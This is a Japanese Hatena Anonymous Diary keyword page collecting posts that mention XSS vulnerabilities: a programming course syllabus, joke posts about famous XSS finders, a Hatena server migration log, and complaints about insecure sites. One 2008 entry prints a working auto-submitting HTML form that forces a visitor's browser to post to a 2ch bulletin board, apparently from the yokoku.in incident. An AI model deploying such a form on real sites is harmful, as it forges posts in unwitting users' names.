「XSS脆弱性」を含む日記 RSS

はてなキーワード: XSS脆弱性とは

2017-09-11

https://anond.hatelabo.jp/20170910205249

まじな話をすると、N予備校プログラミング入門コースやるのがオススメ

https://www.nnn.ed.nico

一日8時間勉強時間があるなら、だいたい一ヶ月で終わる内容。

月額1000円だけどしっかり勉強すれば一ヶ月の無料間中に終わると思う。

もともとN高等学校のノンプログラマーの生徒をWebエンジニアとして就職させるために作られたカリキュラム講師曰く去年はこれで二人エンジニア就職を決めたらしい。

内容も相当親切に説明していて、プログラミングで何か作るだけじゃなくて、就職必要な環境構築やセキュリティまでみっちりやる。

http://qiita.com/sifue/items/7e7c7867b64ce9742aee#%E3%82%B3%E3%83%B3%E3%82%BB%E3%83%97%E3%83%88%E3%82%92%E3%82%82%E3%81%A8%E3%81%AB%E6%A7%8B%E6%88%90%E3%81%95%E3%82%8C%E3%81%9F%E3%82%B3%E3%83%BC%E3%82%B9%E3%81%A8%E5%86%85%E5%AE%B9

講師が書いてる入門コースで習うことがまとめ。テキスト教材もあるけど授業も1項目を2時間で説明している。授業は週2の生放送とそのアーカイブがある。

↓みたいなことが学べる

----

Webプログラミング入門コース

Web ブラウザとは (Chrome, デベロッパーコンソール, alert)

はじめてのHTML (VSCode, HTML, Emmet)

さまざまなHTMLタグ (h, p, a, img, ul, tableタグ)

HTMLで作る自己紹介ページ (HTMLタグ組み合わせ, コンテンツ埋め込み)

はじめてのJavaScript (JS, ES6, エラー)

JavaScriptでの計算 (値, 算術演算子, 変数, 代入)

JavaScript論理を扱う (論理値, 論理積, 論理和, 否定, 比較演算子, if)

JavaScriptループ (ループ, for)

JavaScriptコレクション (コレクション, 配列, 添字, undefined)

JavaScript関数 (関数, 関数宣言, 引数, 戻り値, 関数呼び出し, 再帰)

JavaScriptオブジェクト (オブジェクト, モデリング, プロパティ, 要件定義)

はじめてのCSS (CSS, セレクタ, background-color, border)

CSSを使ったプログラミング (transform, id, class)

Webページの企画とデザイン (企画, 要件定義, モックアップ, 16進数カラーコード)

診断機能の開発 (const, let, JSDoc, インタフェース, 正規表現, テストコード)

診断機能組込み (div, 無名関数, アロー関数, ガード句, truthy, falsy)

ツイート機能の開発 (リバースエンジニアリング, URI, URL, URIエンコード)

Linux開発環境構築コース

LinuxというOS (VirtualBox, Vagrant, Ubuntuインストール, OS, CUIの大切さ)

コンピューター構成要素 (ノイマンコンピューター, プロセス, lshw, man, ps, dfの使い方)

ファイル操作 (pwd, ls, cd, mkdir, rm, cp, mv, find, ホストマシンとの共有ディレクトリ)

標準出力 (標準入力標準出力標準エラー出力パイプgrep)

vi (vimtutor)

シェルプログラミング (シバン, echo, read, 変数, if)

通信ネットワーク (パケット, tcpdump, IPアドレス, TCP, ルーター, ping)

サーバークライアント (tmux, nc, telnet)

HTTP通信 (http, https, DNS, hostsファイル, ポートフォワーディング)

通信をするボットの開発 (cron, ログ収集)

GitHubウェブサイトの公開 (GitHub, リポジトリ, fork, commit, 情報モラル)

イシュー管理とWikiによるドキュメント作成 (Issues, Wiki)

GitとGitHub連携 (git, ssh, clone, pull)

GitHubへのpush (init, add, status, インデックス, commit, push, tag)

Gitのブランチ (branch, checkout, merge, gh-pages)

ソーシャルコーディング (コンフリクト、プルリクエスト)

Webアプリ基礎コース

Node.js (Node.js, nodebrew, Linux, REPL, コマンドライン引数, プルリク課題)

集計処理を行うプログラム (集計, 人口動態CSV, Stream, for-of, 連想配列Map, map関数)

アルゴリズムの改善 (アルゴリズム, フィボナッチ数列, 再帰, time, プロファイル, nodegrind, O記法, メモ化)

ライブラリ (ライブラリ, パッケージマネージャー, npm)

Slackボット開発 (slack, mention, bot)

HubotとSlackアダプタ (hubot, yo)

モジュール化された処理 CRUD, オブジェクトライフサイクル, filter)

ボットインタフェースとの連携 (モジュールのつなぎ込み, trim, join)

同期I/Oと非同期I/O (同期I/O, 非同期I/O, ブロッキング)

例外処理 (try, catch, finally, throw)

HTTPサーバー (Web, TCPとUDP, Webサーバーの仕組み, Node.jsイベントループ, リスナー)

ログ (ログ, ログレベル)

HTTPのメソッド (メソッド, GET, POST, PUT, DELETE, CRUDとの対応)

HTMLフォーム (フォームの仕組み, form, input)

テンプレートエンジン (テンプレートエンジン, jade)

HerokuWebサービスを公開 (Webサービスの公開, heroku, dyno, toolbelt, login, create, logs)

認証利用者を制限する (認証, Basic認証, Authorizationヘッダ, ステータスコード)

Cookie を使った秘密匿名掲示板 (Cookie, Set-Cookie, expire)

UI、URI、モジュール設計 (モジュール設計, フォームメソッド制限, リダイレクト, 302)

フォームによる投稿機能の実装 (モジュール性, textarea, 303)

認証された投稿の一覧表示機能 (パスワードの平文管理の問題, 404, テンプレートのeach-in)

データベースへの保存機能の実装 (データベース, PostgreSQL, 主キー)

トラッキングCookieの実装 (トラッキング Cookie, IDの偽装, Cookie の削除)

削除機能の実装 (データベースを利用した削除処理, 認可, サーバーサイドでの認可)

管理者機能の実装 (Web サービス管理責任, 管理者機能の重要性)

デザインの改善 (Bootstrap, レスポンシブデザイン, セキュリティの問題があるサイトを公開しない)

脆弱性 (脆弱性, 脆弱性で生まれる損失, 個人情報保護法, OS コマンド・インジェクション)

XSS脆弱性対策 (XSS, 適切なエスケープ処理, リグレッション)

パスワード脆弱性対策(ハッシュ関数, メッセージダイジェスト, 不正アクセス禁止法, パスワードジェネレーター, 辞書攻撃)

セッション固定化攻撃脆弱性対策 (セッション, セッション固定化攻撃, ハッシュ値による正当性チェック)

より強固なセッション管理 (推測しづらいセッション識別子, 秘密鍵)

CSRF脆弱性対策 (CSRF, ワンタイムトークン)

安全なHerokuへの公開 (脆弱性に対する考え方, HTTPの廃止)

Webアプリ応用コース

Webフレームワーク (Express.js, フレームワーク導入, 簡単なAPI, セキュリティアップデート, Cookie パーサー, ミドルウェア, 外部認証, ロガー)

ExpressのAPI (app, Properties, Request, Response, Router)

GitHubを使った外部認証 (Passport, OAuth)

スティングフレームワーク (Mocha, レッド, グリーン, リファクタリング)

継続的インテグレーション (CircleCI)

クライアントフレームワーク (Webpack, Chrome 以外のブラウザでもES6)

DOM操作フレームワーク (jQuery, jQueryアニメーション, this)

AJAX (jQuery.ajax, クロスドメイン, 同一生成元ポリシー, x-requested-by, CORS)

WebSocket (WebSocket, WebSocketの状態遷移, Socket.io)

RDBとSQL (DDL, DCL, CREATE, DROP, INSERT, DELETE, UPDATE, WHERE)

データモデリング (リレーショナルモデル, 正規化)

テーブルの結合 (外部結合, 内部結合, 片側外部結合, JOIN ON)

インデックス (インデックス, 複合インデックス, Bツリー)

集計とソート (SUM, COUNT, ORDER BY, GROUP BY)

「予定調整くん」の設計 (要件定義、用語集、データモデル、URL設計モジュール設計、MVC)

認証とRouterモジュールの実装 (Mocha, supertest, passport-stub, モックテスト)

予定とユーザーの保存 (セキュリティ要件, UUID, 複合主キー)

予定とユーザーの一覧の表示 (非同期処理, Promise, then)

出欠とコメントの表示 (入れ子の連想配列, Promise.all, 子どもからデータを消す)

出欠とコメント更新 (Promiseチェイン, リファクタリング)

予定の編集と削除 (要件の衝突, 関数再利用)

デザインの改善 (this, グローバルオブジェクト)

セキュリティ対策と公開 (X-Frame-Options, Heroku環境変数)

2010-09-22

XSS四天王

twitterXSS脆弱性が露呈してちょいとした騒ぎになっているので表の世界ではあまり知られていないXSS四天王について軽くメモしておく。

Masato Kinugawa(きぬがわ まさと)

日本人。今回のXSS脆弱性騒動を引き起こした男。表の顔はライブドア所属のサラリーマンだが夜になると7色の言語を操り電脳社会を駆け回る。推定27歳。一件のXSS脆弱性報告で15000円を稼ぎ白金台XSS御殿を建てる。四天王序列は最下位でありお馴染みのテンプレ「●●がやられたか…」「ククク…やつはしょせん我ら四天王の中では捨て駒よ…」の●●に当てはまる男。得意技は『デスマーチ』。

 

Hamachiya2(はまちや セカンド)

日本人。表の顔はサラリーマンプログラマ。推定10代。数年に一度XSS脆弱性を用いたあいさつブームを日本中に引き起こす四天王序列No.3。伝説XSS愛好家はまちーの息子。必殺技は『HelloAgain』。

 

Michael Jackson(マイケルジャクソン)

アメリカ人。故人。表の顔はポップスター。子供のころ「ABC~♪」と連呼していて無機質なアルファベットと記号を組み合わせることでXSSが発生する事に存在世界で初めて気付いた開拓者。

XSS界最大の壁Google社の脆弱性発見直後に謎の死をとげる。満50歳没。晩年四天王序列は2番目であった。必殺技は「FaceEdit」

 

Hamachee(はまちー はまちやワン)

故人。日本XSS先進国に引き上げた功労者。愛用機はシグマリオン3ライブドア時代に髭男爵DanKogaiとの社内権力闘争に敗れ下野裏社会XSSを駆使して頭角を現し四天王トップに10年君臨する。後継者Hamachiya2の台頭を見届けるように2009年ひっそりとこの世を去る。必殺技は盟友TakagiHiromitsuとの連携技「Don't say sanitizing!」

2009-07-02

http://anond.hatelabo.jp/20090702181525

ご相談ありがとうございました。

タイトル釣りです」は時によって逆効果ですが、回答させていただきます

 

また悩み相談のタイトルは、毎回、そのお悩み本文の中から特徴的なフレーズを切り出して使わせていただくのですが、今回は言うまでもなくあの部分を使わせていただきました。

 

さて、彼が はてブ依存症とのこと。

 

かしこれ、根本的には「承認欲求依存症」です。

はてなブックマークだけを話題にあげるのはかわいそうです。主にlive doorクリップとかが特にかわいそうです。話題にもされず。

 

さてしかし、彼の気持ちは分からないでもありません。

 

自分自身、はてブに限らず、増田ハイクなどで釣り記事を書くと、その反応が気になってしかたなくなります。

頭の中で、直前に書いた内容を何度も何度も反芻し、

「うふふふ…。自分でもあんなコトを書くなんて…。みんなどう思うかなぁ…。うふふふふふふ」

みたいな感じです。

 

冷静に考えると、あらためて変態だと思います。

 

さて、しかしだからといって、目の前にいるあなたのことが嫌いとか、存在感が薄いとか、どうでもいいとか、二次元以下とか作画崩壊とか、そんなことはまったくありません。この言葉によってさらに安心できなくなったかもしれませんが安心してください。

 

いずれにしても、あなたのことはあなた。

そして、はてなブックマークのことは はてなブックマークとして、並行して楽しんでいるわけです。

 

完全に はてなブックマークのことしか考えていなければ、あなたとすら会わず、部屋にこもりきりでネガコメってるはずです。ここまでくると記事をプリントアウトして医者にGO!です。すなわちまだ彼は軽いと判断できます。

 

ですのでそこまで心配することはないとは思いますが、もしそれでもさらにあなたをハックさせたいと思うのでしたら、接続の前に、あなたのポートを全て開放してから臨むというのはいかがでしょうか。

 

「あのタイトル欄についてだけど、確かにXSS脆弱性あるよねー!」

「あれ、スクリプト埋め込んだ!」

 

など、はてなの話題についてidコールで触れれば、彼もあなたをハックしたくなるはずです。

彼にしてみれば、「俺のスクリプトのインジェクションもしたい、はてブについての反応も気になる」わけですから、あなたがどちらも満たしてくれるなら、それに越したことはないわけですし。

 

ただ、彼のブコメ内容と真っ向から反対するdisりなどはいけません。

「こいつは理解してくれていない。他のお気に入りさんなら…」

と思い、プライベートモード世界に沈んでしまいます。気をつけましょう。

 

解決策になっているか分かりませんが、とにかく はてな倒産させる以外にできる方法としては、ベストなのではないかと思います。

 

 

ちなみに はてなプロフィール中に「アンテナ」というものがありますが、あれを見るたびに、ストーキングされている自分を思い描きます。

昼間に何個もの活動があったら、「あぁ、きっとみんな私のことニートだと思ってる」みたいな。

 

はてなより先に、こんなことを考える自分が人として倒産しそうな気がしつつ、あなたの幸せを心より願っております。

2008-12-14

[]歴史

前回のエントリに、思いのほかブックマークがついた。

せっかくなので、ここ2年ほどのさくらインターネットiDC移転を中心に、わかる範囲ではてなサーバ変遷の歴史をまとめてみようと思う。

さくらインターネットiDCへ順次移転
2007-01-29 mobile.hatena.ne.jp 追加
> 59.106.108.68:	mobile.hatena.ne.jp.
2007-02-03 f.hatena.ne.jp 移転
> 59.106.108.69:	f.hatena.ne.jp.
2007-02-16 rimo.tv 追加
> 59.106.108.70:	rimo.tv.
2007-03-14 不正侵入
2007-03-17 b.hatena.ne.jp 移転
移転
< 125.206.202.66:	mgw.hatena.ne.jp.
< 61.196.246.69:	b.hatena.ne.jp.
< 61.196.246.70:	b.hatena.ne.jp.
移転
> 59.106.108.71:	mgw.hatena.ne.jp.
> 59.106.108.72:	b.hatena.ne.jp.
2007-03-22 rimo.tv
2007-04-09 g.hatena.ne.jp 移転
移転
< 221.186.129.148:      g.hatena.ne.jp.
移転
> 59.106.108.73:        g.hatena.ne.jp.
2007-04-17 music.hatelabo.jp 終了
2007-04-21 anond.hatelabo.jp
2007-05-10 a.hatena.ne.jp
2007-05-22 rimo.tv
2007-05-22 XSS
2007-05-29 はてなロゴリニューアル
2007-06-05 r.hatena.ne.jp ring.hatena.ne.jp 移転
移転
< 125.206.202.82:       search.hatena.ne.jp.
< 221.186.129.147:      ring.hatena.ne.jp.
< 221.186.146.28:       a.hatena.ne.jp.
< 61.196.246.68:        r.hatena.ne.jp.
移転
> 221.186.129.147:      search.hatena.ne.jp.
> 59.106.108.74:        a.hatena.ne.jp.
> 59.106.108.75:        r.hatena.ne.jp.
> 59.106.108.76:        ring.hatena.ne.jp.
2007-06-26 d.hatena.ne.jp 移転
移転
< 125.206.202.83:       d.hatena.ne.jp.
< 221.186.129.146:      d.hatena.ne.jp.
< 221.186.146.29:       d.hatena.ne.jp.
< 61.196.246.67:        d.hatena.ne.jp.
移転
> 59.106.108.77:        d.hatena.ne.jp.
2007-07-05 ユーザー登録システム刷新
2007-07-11 s.hatena.ne.jp s.hatena.com m.hatena.ne.jp m.hatena.com 追加
> 59.106.108.97:        d.hatena.com.
> 59.106.108.97:        hatena.com.
> 59.106.108.97:        m.hatena.com.
> 59.106.108.97:        m.hatena.ne.jp.
> 59.106.108.97:        s.hatena.com.
> 59.106.108.97:        s.hatena.ne.jp.
2007-07-17 ポケットはてな ドコモ公式サイト
2007-07-19 XSS
2007-07-27 faviconリニューアル
2007-08-08 Rimoリニューアル
2007-08-16 ユーザー助け合い掲示板開設
2007-08-30 はてなキーワード
2007-09-13 お気に入りAPI公開
2007-09-21 はてな回線工事
2007-09-28 d2.hatena.ne.jp 追加
> 59.106.108.80:        d2.hatena.ne.jp.
2007-10-01 はてなサポート掲示板開設
2007-11-02 はてなスターOpenID受入
2007-11-08 OpenID提供
2007-11-13 d2.hatena.ne.jp

d2.hatena.ne.jpで新しいコメント構造の実験を開始しました - はてなダイアリー日記

2007-11-13 ☆の登録総数が1000万個を突破
2007-11-14 現代用語の基礎知識2008
2007-11-15 アンテナカウンター・検索を移転
移転
< 221.186.129.147:      counter.hatena.ne.jp.
< 221.186.129.147:      search.hatena.ne.jp.
移転
> 59.106.108.81:        counter.hatena.ne.jp.
> 59.106.108.82:        search.hatena.ne.jp.

アンテナフロントエンドはすでに移転(置換)してる模様

2007-11-30 XSS
2007-12-04 XSS
2007-12-05 XSS
2007-12-10 XSS
2007-12-13 w.hatena.ne.jp h.hatena.ne.jp 追加
> 59.106.108.78:	w.hatena.ne.jp.
> 59.106.108.84:	h.hatena.ne.jp.
> 59.106.108.84:	h.hatena.com.
> 59.106.108.98:	w.hatena.com.
2007-12-15 はてなハイク正式公開
2007-12-20 www.hatena.ne.jp q.hatena.ne.jp i.hatena.ne.jp graph.hatena.ne.jp map.hatena.ne.jp screenshot.hatena.ne.jp 移転
移転
< 221.186.146.27:	www.hatena.ne.jp.
< 61.196.246.68:	screenshot.hatena.ne.jp.
< 125.206.202.66:	map.hatena.ne.jp.
< 125.206.202.66:	i.hatena.ne.jp.
< 125.206.202.66:	graph.hatena.ne.jp.
< 125.206.202.66:	q.hatena.ne.jp.
移転
> 59.106.108.86:	www.hatena.ne.jp.
> 59.106.108.87:	screenshot.hatena.ne.jp.
> 59.106.108.88:	map.hatena.ne.jp.
> 59.106.108.89:	i.hatena.ne.jp.
> 59.106.108.92:	graph.hatena.ne.jp.
> 59.106.108.99:	q.hatena.ne.jp.
2007-12-21 d2.hatena.ne.jp
2008-01-04 i.hatena.ne.jp 移転
2008-01-07 auth.hatena.ne.jp 移転
移転
< ???.???.???.???:	auth.hatena.ne.jp.
移転
> 59.106.108.90:	auth.hatena.ne.jp.
2008-01-09 hatelabo.jp 移転

長いので省略

2008-01-18 d2.hatena.ne.jp
2008-01-24 なぞなぞ認証
2008-01-25 serif.hatelabo.jp 移転
2008-01-25 サーバ移転完了
2008-01-25 d2.hatena.ne.jp
2008-01-26 anond.hatelabo.jp
2008-01-28 rokuro.hatelabo.jp 追加
> 59.106.108.93:	rokuro.hatelabo.jp.
2008-01-31 h.hatena.com
2008-02-07 認証セット
2008-02-14 はてな本移転
2008-02-19 認証セット
2008-02-28 f.hatena.ne.jp
2008-03-25 f.hatena.ne.jp
2008-03-31 map.hatena.ne.jp
2008-04-24 f.hatena.ne.jp
2008-04-25 ring.hatena.ne.jp
2008-05-03 XSS
2008-05-22 はてなクラブ開始
2008-05-29 f.hatena.ne.jp
2008-06-05 f.hatena.ne.jp
2008-06-10 w.hatena.ne.jp
2008-07-15 b.hatena.ne.jp
2008-08-26 ネットワーク基幹ルータの入れ替え
2008-08-28 d.hatena.ne.jp
2008-09-01 rimo.tv 終了
2008-09-01 k.hatena.ne.jp 追加
> 59.106.108.102:	k.hatena.ne.jp.
2008-10-30 f.hatena.ne.jp
2008-11-07 はてなブックマークベータテスト開始
> 59.106.108.103:	favicon.hatena.ne.jp.
> 59.106.108.105:	img.b.hatena.ne.jp.
> 59.106.108.106:	bbeta.hatena.ne.jp.
2008-11-25 はてなブックマークリリース
2008-11-26 ring.hatena.ne.jp
2008-12-04 news.hatelabo.jp counting.hatelabo.jp bottle.hatelabo.jp 追加
> 59.106.108.93:	bottle.hatelabo.jp.
> 59.106.108.93:	counting.hatelabo.jp.
> 59.106.108.93:	news.hatelabo.jp.
余談 はてなサーバの実態あれこれ

2008-08-04

Re: 予告inにおけるXSS脆弱性、及び被害の概要について

>>犯行予告通報フォームのURL部分のエスケープ処理(不正文字列を無効化する処理)を行っていませんでした。

>>結果、悪意あるコードURL部分に埋め込んだ場合、コードを実行させる危険性が存在しました。

そんな典型的な所の処理をしていなかったの?

予告in中の人レベルって・・・絶句

http://yokoku.in/column/release/080803.php

2008-08-03

予告in犯罪予告スクリプトメモ

<body onload="document.frm.submit()">
<form name="frm" method="post" action="http://yutori.2ch.net/test/bbs.cgi?guid=ON">
<input value="書き込む" name="submit" type="submit">
<input name="FROM" size="19">
<input name="mail" size="19"><br>
<textarea rows="5" cols="70" wrap="off" name="MESSAGE">てst</textarea>
<input name="bbs" value="news4vip" type="hidden">
<input name="key" value="key" type="hidden">
<input name="time" value="time" type="hidden">
</form>

2008-02-03

Attacking cgi.rb

cgi.rb がいかに駄目なライブラリか、という話。

もちろん、反論もあるだろう。たとえば「Defending PHP」とか。

でも、個人的にはやはり否定側の方が筋が通ってる印象かな。

特に「ruby初心者に学びやすい(と言われていることが問題である)」という部分に共感する。 ruby初心者に簡単かもしれないが、初心者による手を抜いたWebアプリケーションrubyが作られた当初はともかく、現代では害悪ではないだろうか。

Webアプリケーションをなめるな

cgi.rbならではの理由がないわけではないことはわかる。標準添付されているとか、デプロイが簡単とか。

でも、「標準添付」を一般公開されるWebアプリケーションを開発するためのライブラリとしての利点にするのはもうやめようよ。

追記

「どのライブラリで書いてもおかしなコードを書く奴は書く」という指摘もあった。それは言うまでもない事実ではある。そこには反論しない。

が、本当に問題なのは、世の中には「おかしなコードを書くことを助長するライブラリ」もあるという点だ。で、そういうライブラリにはおおむね「標準添付」というラベルがついている。どういうわけだか。

たぶん、「初心者がおかしなコードを書くのをじゃましない」とかあるいは「初心者っぽいコードを積極的に支援する」から、「標準添付」って呼ばれるんだろう。もしくは「設計者がまだ初心者」とか。

そういうライブラリ存在しちゃいけないとは言わないけど(人に迷惑をかけない範囲で)、ここ半世紀のライブラリ進化をないがしろにするのはもったいないと思うな

http://www.rubyist.net/~matz/20080126.html#p04

2008-02-01

http://anond.hatelabo.jp/20080131152701

公開するのはOKだと思うが、他人の個人情報とか預かっちゃだめって事じゃない。

XSS脆弱性はそもそも信用されていないサーバーだろうから、あまり問題ないし。

SQLインジェクションで、その初心者アカウント以上の権限を乗っ取られるとしたら、

レンタルサーバー業者とかの問題だし。

2007-10-17

http://anond.hatelabo.jp/20071017214636

こんなことがまだまだできるってことは、

XSS脆弱性なんかも探せば結構残ってたりするんじゃないのか?

探して探して!はまちちゃん><

2007-10-14

http://anond.hatelabo.jp/20071014194230

家入社長は日頃から「程度が低いブログ」と感じてて思わず見下したコメしちゃったんだよ。

あの人は正義感強いからね。

小銭目当てに間違った情報を垂れ流すブログは嫌いなんだろう。

日本語不自由、デザインださい、語情報だらけ、XSS脆弱性垂れ流し。

XSSなんてひどすぎるぜ?

あれちょっとしたハッカーに狙われたら大騒ぎになるんじゃないかな。

 
アーカイブ ヘルプ
ログイン ユーザー登録
ようこそ ゲスト さん